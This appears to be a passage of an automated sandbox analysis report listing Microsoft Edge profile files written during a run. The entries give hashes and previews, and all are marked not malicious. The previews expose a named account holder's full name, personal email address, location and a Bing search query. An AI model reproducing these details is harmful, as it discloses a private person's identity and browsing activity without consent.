                                                                                                                                                                                                        SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
                                                                                                                                                                                                        MD5:3CB1586353968B52F028A678ED76E36E
                                                                                                                                                                                                        SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
                                                                                                                                                                                                        SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
                                                                                                                                                                                                        SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFdc2eb3.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9000
                                                                                                                                                                                                        Entropy (8bit):4.994257462742733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
                                                                                                                                                                                                        MD5:3CB1586353968B52F028A678ED76E36E
                                                                                                                                                                                                        SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
                                                                                                                                                                                                        SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
                                                                                                                                                                                                        SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFdc4cca.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9000
                                                                                                                                                                                                        Entropy (8bit):4.994257462742733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
                                                                                                                                                                                                        MD5:3CB1586353968B52F028A678ED76E36E
                                                                                                                                                                                                        SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
                                                                                                                                                                                                        SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
                                                                                                                                                                                                        SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):1.4452957416275574
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:DIEumQv8m1ccnvS61kUrsSyszhyVsiuWfjsRlMxs7qYClsy:DIEumQv8m1ccnvS65yXuWf0+dR
                                                                                                                                                                                                        MD5:CD82961944CF8FA952D0173990E4823E
                                                                                                                                                                                                        SHA1:3FDDF3E5589EFDFC54A18AC885DE8673CBF6317F
                                                                                                                                                                                                        SHA-256:EFB4617D275799AA53955F26BC6D4A49CD564EB9F608109D6BBA4184F0F2F581
                                                                                                                                                                                                        SHA-512:1F0C71790839DF5EEEE61F42AA51F9FBC4F69743F11B65EA4691BB47968D89B2DA94FEBF4A0F517247790713F1D344725BEAE3FA48CCCE4501E35626295805CD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2491
                                                                                                                                                                                                        Entropy (8bit):5.024582630822769
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
                                                                                                                                                                                                        MD5:B88693A29632D7D9F60A1D83D654034B
                                                                                                                                                                                                        SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
                                                                                                                                                                                                        SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
                                                                                                                                                                                                        SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFdc2ed2.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2491
                                                                                                                                                                                                        Entropy (8bit):5.024582630822769
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
                                                                                                                                                                                                        MD5:B88693A29632D7D9F60A1D83D654034B
                                                                                                                                                                                                        SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
                                                                                                                                                                                                        SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
                                                                                                                                                                                                        SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFdc4caa.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2491
                                                                                                                                                                                                        Entropy (8bit):5.024582630822769
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
                                                                                                                                                                                                        MD5:B88693A29632D7D9F60A1D83D654034B
                                                                                                                                                                                                        SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
                                                                                                                                                                                                        SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
                                                                                                                                                                                                        SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5306
                                                                                                                                                                                                        Entropy (8bit):3.4395372838812293
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:qQIKp//4Yny8s3OmBiNBzfQZQMgCZK99Xp+b8+diOokiaI5SLl9iSrp1LEzVSl7F:qQRQYny8jmBiNBsKRp99Xp+wqiODij5s
                                                                                                                                                                                                        MD5:A6B2CDCFCC7A468FE699294C0BCB8DA6
                                                                                                                                                                                                        SHA1:BD34025706EFC42F8F0648FC0E3A965315BF83D7
                                                                                                                                                                                                        SHA-256:91318DC54E8479A86A512557AC6370166382800BCD5CB9BBAD7A828331034243
                                                                                                                                                                                                        SHA-512:4294FEADE666928D631F5E3694257BB4C1582124B1A421C857453124A9288DB6A377E0F1D7990903E7AAF0AE43B85A8BD1784649206E3BE85ACD71715D1EB51C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................V.b................next-map-id.1.Cnamespace-d4eca2c5_e32e_4506_9739_ee50740615a4-https://ntp.msn.com/.0u|.L.................map-0-shd_sweeper.&{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.h.p.s.b.t.q.l.t.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.,.x.a.d.s.-.a.d.q.i.s.c.b.m.m.-.a.a.,.a.d.s.-.f.l.r.m.g.p.-.n.o.i.s.e.-.t.,.s.i.d.-.f.l.r.n.o.i.s.e.2.,.p.r.g.-.1.s.w.-.s.a.e.e.f.b.t.1.,.p.r.g.-.1.s.w.-.s.a.-.d.n.n.-.r.m.-.c.a.l.i.b._.t.1.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.1.s.-.n.t.f.1.-.r.d.i.d.n.,.1.s.-.n.t.f.1.-.f.s.p.t.b.r.c.,.1.s.-.n.t.f.1.-.p.n.o.t.s.,.p.r.g.-.1.s.w.-.m.o.n.e.x.p.b.,.p.r.g.-.1.s.w.-.p.n.o.t.i.a.,.p.r.g.-.p.1.-.t.s.4.c.o.l.d.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.-.c.,.p.r.g.-.1.s.w.-.d.e.f.e.r.c.o.n.,.p.r.g.-.f.i.n.-.l.2.d.u.e.n.v.-.c.,.2.4.0.9.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                        Entropy (8bit):5.031095772949762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNyDM+q2PCN23oH+TcwtrQMxIFUt8YUz1fNygZmw+YUz1fNr7pDMVkwOCN2n:+1fNKM+v1YebCFUt8Z1fN3/+Z1fNxMVq
                                                                                                                                                                                                        MD5:6743F8B20F1697F581C4EA7CB6E75176
                                                                                                                                                                                                        SHA1:B17B6C2EE2AFD364141E2F6064894CDDA75916A8
                                                                                                                                                                                                        SHA-256:E77E0FD44DBCFE2D0CAE90FD1D15CDB4C631A756656A842DF5B433E13F29AD4E
                                                                                                                                                                                                        SHA-512:4C59FE474119971BE85CEB5D6B4744AB7AAB261C1B98BF3F55B56801F2CDBED3BB6A01FAE8A5BCA802E53D5C418DA207F97B4ABFED6C933C4B120DB4C10BF47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.403 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-02:11:11.403 13fc Recovering log #3.2024/11/11-02:11:11.404 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                        Entropy (8bit):5.031095772949762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNyDM+q2PCN23oH+TcwtrQMxIFUt8YUz1fNygZmw+YUz1fNr7pDMVkwOCN2n:+1fNKM+v1YebCFUt8Z1fN3/+Z1fNxMVq
                                                                                                                                                                                                        MD5:6743F8B20F1697F581C4EA7CB6E75176
                                                                                                                                                                                                        SHA1:B17B6C2EE2AFD364141E2F6064894CDDA75916A8
                                                                                                                                                                                                        SHA-256:E77E0FD44DBCFE2D0CAE90FD1D15CDB4C631A756656A842DF5B433E13F29AD4E
                                                                                                                                                                                                        SHA-512:4C59FE474119971BE85CEB5D6B4744AB7AAB261C1B98BF3F55B56801F2CDBED3BB6A01FAE8A5BCA802E53D5C418DA207F97B4ABFED6C933C4B120DB4C10BF47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.403 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-02:11:11.403 13fc Recovering log #3.2024/11/11-02:11:11.404 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375782673696843

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1404
                                                                                                                                                                                                        Entropy (8bit):3.6368889708638257
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:3i6qPNS2TMz6T9psAFHvCLp3k2amEtLqloJKH+6grQUSkOAF77/:3i6kQ+ZzFaLpVFERuoJKztqOqz
                                                                                                                                                                                                        MD5:46A8CCD3A3F48B07051529EDC39663BE
                                                                                                                                                                                                        SHA1:A426B852EA795A1303C3897225449A0686109315
                                                                                                                                                                                                        SHA-256:FCD61F25D2093E26F1AE2DBE785C8A0C3F329DA10EF40AF1E41C81C79B9709AD
                                                                                                                                                                                                        SHA-512:9B81571A30EEA03EF299ABB75B488C42BC0B94C1FB83C0C260C31FDFA7B72B8ECA3DE36594DAF572A1C90E0FEBA88124206D53AD8FAF22A18B8679E778A099CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SNSS................................"........9.#4.......$...7878e207-93cb-4662-9380-78e0009f3115........................................................!.............................................1..,.......$...d4eca2c5_e32e_4506_9739_ee50740615a4.........................\...........5..0.......&...{30573FE4-B0CF-47A3-8C51-33B1BFA660D1}...........................................edge://newtab/......N.e.w. .t.a.b...........................................................x...............X...............`...............X.........>.&....>.&......................................................................j...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.U.S.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.&.O.C.I.D.=.M.N.H.P._.U.5.3.1.....................................8.......0.......8....................................................................... .............................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13375782673925510

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3985
                                                                                                                                                                                                        Entropy (8bit):3.93703447255499
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:3c+hF0wD8WQpV8UIoQUbXf6sKy7s+WBs4aVj:31gwDI8xoBbXfUlaVj
                                                                                                                                                                                                        MD5:3CB8715E8505E106C013453869873468
                                                                                                                                                                                                        SHA1:8CD44DB21343EA7E10D0AB7B62CEC4F57F12163A
                                                                                                                                                                                                        SHA-256:A1E302732C1A9591B12A2C7C233179F1404D0A51B2D0CC4375D3D414E1712F20
                                                                                                                                                                                                        SHA-512:7FC6A51272911C05BE22BF277E274BE91E666B09A6537E2B918E5409E894592001110BFF4404B387DCAB0C8B27F431321F02DECFE3156A807FD28EEEC56C80B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SNSS.................d^.`/.q..l...............https://www.bing.com/search?q=regedikt&form=WNSGPH&qs=SW&cvid=1c4c2e2811e44c03a63aad6fcf391716&pq=regedikt&cc=GB&setlang=en-US&wsso=Moderate....r.e.g.e.d.i.k.t. .-. .S.e.a.r.c.h...........................................................x...............................................h........*..2....*..2...........................x....................................... .......h.t.t.p.s.:././.w.w.w...b.i.n.g...c.o.m./.s.e.a.r.c.h.?.q.=.r.e.g.e.d.i.k.t.&.f.o.r.m.=.W.N.S.G.P.H.&.q.s.=.S.W.&.c.v.i.d.=.1.c.4.c.2.e.2.8.1.1.e.4.4.c.0.3.a.6.3.a.a.d.6.f.c.f.3.9.1.7.1.6.&.p.q.=.r.e.g.e.d.i.k.t.&.c.c.=.G.B.&.s.e.t.l.a.n.g.=.e.n.-.U.S.&.w.s.s.o.=.M.o.d.e.r.a.t.e.................................................0.......H.......X.......x...............................................................8.......P.......h.......................................................h...0.......?.%. .B.l.i.n.k. .s.e.r.i.a.l.i.z.e.d. .f.o.r.m. .s.t.a.t.e. .v.e.r.s.i.o.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.4418480883730883
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:TLiN/cUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLiBVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                        MD5:444C697E8AF5C7ABF6A576C698CCDAE6
                                                                                                                                                                                                        SHA1:7E6455ED6A534CCBDE446B25CB8A387E40A74BBA
                                                                                                                                                                                                        SHA-256:7401AE966CB49B237B8F07B23585BC3D1961C0F5762A43E2796776F870E09297
                                                                                                                                                                                                        SHA-512:B2E03753CE8D60980984769A7778F8F93B9E2B84B9A7FFD0F04759159F69C98FC1AED0EAECF9CF044B9BE2D3490C61CECE7E618F91B1398BCCA809AE7D9BF32C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):112
                                                                                                                                                                                                        Entropy (8bit):4.64854251834261
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:41tt0diERG2FZlePnVLcrSUAAhVH2FKicgrX3:et0845beVLcrlDs6gL
                                                                                                                                                                                                        MD5:02239071EC76DC5733EB6EE74ED2494D
                                                                                                                                                                                                        SHA1:51857A3FE9A4372574FE78D666D8A16328EDBFD8
                                                                                                                                                                                                        SHA-256:9D6B9A60D48AD87A901085D59B4D904418EF13728A074BC7B9B329A50B576AF8
                                                                                                                                                                                                        SHA-512:DB1FF30942D7A4BB8A81DBD8A8CD9F855F6F9E4D9126155EBF844E455AA5F10CD2C62FAA97E70010E2544718B6A562A0F9ECCECE1F00F2A5BB94B7005935F94A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.On.!................database_metadata.1J..-A............... 806b9ba4c71ee770bde1effc5f33c190.............."...

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                        Entropy (8bit):5.074842526871519
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNMeIq2PCN23oH+Tcwt7Uh2ghZIFUt8YUz1fNMeZZmw+YUz1fNMezkwOCN20:+1fN6v1YebIhHh2FUt8Z1fNz/+Z1fNpd
                                                                                                                                                                                                        MD5:8650713BE1F07BA046A21E36A0720FE5
                                                                                                                                                                                                        SHA1:46EA522A09A4DAE8EB34E7B36E21175993695BBD
                                                                                                                                                                                                        SHA-256:30FDABCBAF92EA99E98992A9BAEDA32AB1845858F3DE6FAE508D872441DC9105
                                                                                                                                                                                                        SHA-512:73DFFBC0B9C88CA77D7ACA3F45AF95B0D6CFABB16EA7A0F8C5FC3A14E22AB75DAF5B48A23246E9D1F8D2FE8E2E57C25FE73BDAEC68513C733E10870D965EEB13
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.167 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-02:11:11.167 1c84 Recovering log #3.2024/11/11-02:11:11.167 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

